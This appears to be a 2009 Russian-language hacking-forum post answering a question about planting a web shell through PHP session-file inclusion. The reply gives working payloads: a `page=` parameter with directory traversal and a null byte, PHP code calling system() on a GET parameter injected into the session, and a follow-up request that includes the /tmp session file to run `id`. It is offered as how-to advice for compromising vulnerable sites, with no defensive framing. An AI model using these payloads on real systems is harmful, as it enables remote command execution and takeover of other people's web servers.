22.12.2009, 14:21
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от GenTao
Также интересует,как залить шелл с помощью метода инклуда сессий,описанного здесь:
_http://ahacc.ru/forum/showthread.php?t=27
"Подменив эти данные на нужный php-код и заинклудив сессию, мы поимеем шелл." - Каким образом подменить и ГДЕ ? Единственное,что приходит на ум - Отправка заголовка COOKIE: PHPSESSID=<?evilcode?> в НТТР запросе.Но ведь не засунешь же туда весь код шелла ?
Как результат должен проинклудиться шелл,я так понял.
смотри допустим найшол ты уязвимый параметр:
page=
пишеш
page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>
а потом просто подцепляеш из tmp co своей sess_
ну типо так к примеру 
page=../../../../../../tmp/sess_23h4g23jh45g245v4jh%00&cmd=id
|
|
|